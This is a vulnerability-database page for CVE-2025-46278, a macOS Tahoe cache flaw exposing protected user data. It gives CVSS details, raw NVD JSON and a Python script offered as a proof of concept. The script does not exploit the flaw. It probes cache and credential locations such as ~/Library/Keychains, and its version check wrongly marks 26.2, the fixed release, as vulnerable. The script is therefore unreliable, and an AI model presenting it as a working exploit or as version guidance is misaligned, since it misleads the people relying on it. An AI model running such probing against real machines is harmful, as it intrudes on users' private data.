Security Vulnerability Report
中文
CVE-2025-46278 CVSS 5.5 MEDIUM

CVE-2025-46278

Published: 2025-12-17 21:16:13
Last Modified: 2025-12-18 20:15:56
Source: [email protected]

Description

The issue was addressed with improved handling of caches. This issue is fixed in macOS Tahoe 26.2. An app may be able to access protected user data.

CVSS Details

CVSS Score
5.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:o:apple:macos:*:*:*:*:*:*:*:* - VULNERABLE
macOS Tahoe < 26.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-46278 PoC - macOS Tahoe Cache Access Vulnerability # This PoC demonstrates the cache access vulnerability in macOS Tahoe # Note: This is a conceptual PoC for educational purposes only import os import sys import subprocess def check_macos_version(): """Check if running on vulnerable macOS version""" try: result = subprocess.run(['sw_vers', '-productVersion'], capture_output=True, text=True) version = result.stdout.strip() print(f"[*] Detected macOS version: {version}") return version except Exception as e: print(f"[-] Error detecting OS version: {e}") return None def enumerate_cache_directories(): """Enumerate potential cache directories that might be accessible""" cache_paths = [ "/Library/Caches/com.apple.caches", "~/Library/Caches", "/private/var/folders/", "/System/Library/Caches" ] accessible_caches = [] for cache_path in cache_paths: expanded_path = os.path.expanduser(cache_path) if os.path.exists(expanded_path): try: # Attempt to list contents contents = os.listdir(expanded_path) print(f"[+] Accessible cache directory: {expanded_path}") print(f" Contents: {len(contents)} items") accessible_caches.append(expanded_path) except PermissionError: print(f"[-] Permission denied: {expanded_path}") return accessible_caches def attempt_protected_data_access(): """Attempt to access potentially protected cache data""" print("[*] Attempting to access protected cache data...") # Common locations where sensitive data might be cached sensitive_paths = [ "/private/var/folders/zz/zyxvpxvq6csfxvn_n00010b0000048/", "/Library/Application Support/", "/System/Library/Security/", "~/Library/Keychains/" ] for path in sensitive_paths: expanded_path = os.path.expanduser(path) if os.path.exists(expanded_path): try: # List directory contents items = os.listdir(expanded_path) print(f"[+] Successfully accessed: {expanded_path}") print(f" Found {len(items)} items") for item in items[:5]: # Show first 5 items print(f" - {item}") except PermissionError: print(f"[-] Access denied: {expanded_path}") def main(): print("=" * 60) print("CVE-2025-46278 PoC - macOS Tahoe Cache Vulnerability") print("=" * 60) # Check OS version version = check_macos_version() if version and "26.2" in version: print("[!] Target appears to be macOS Tahoe 26.2") print("[!] System may be vulnerable if not patched") # Enumerate accessible caches print("\n[*] Enumerating accessible cache directories...") accessible = enumerate_cache_directories() # Attempt protected data access print("\n[*] Testing protected data access...") attempt_protected_data_access() print("\n[*] Analysis complete") print("[*] Recommendation: Update to macOS Tahoe 26.2 or later") if __name__ == "__main__": main()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-46278", "sourceIdentifier": "[email protected]", "published": "2025-12-17T21:16:13.247", "lastModified": "2025-12-18T20:15:56.120", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "The issue was addressed with improved handling of caches. This issue is fixed in macOS Tahoe 26.2. An app may be able to access protected user data."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.8, "impactScore": 3.6}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:N", "baseScore": 5.0, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.3, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-200"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:apple:macos:*:*:*:*:*:*:*:*", "versionEndExcluding": "26.2", "matchCriteriaId": "FBA92B6D-E36C-432B-A041-94D81427CD75"}]}]}], "references": [{"url": "https://support.apple.com/en-us/125886", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.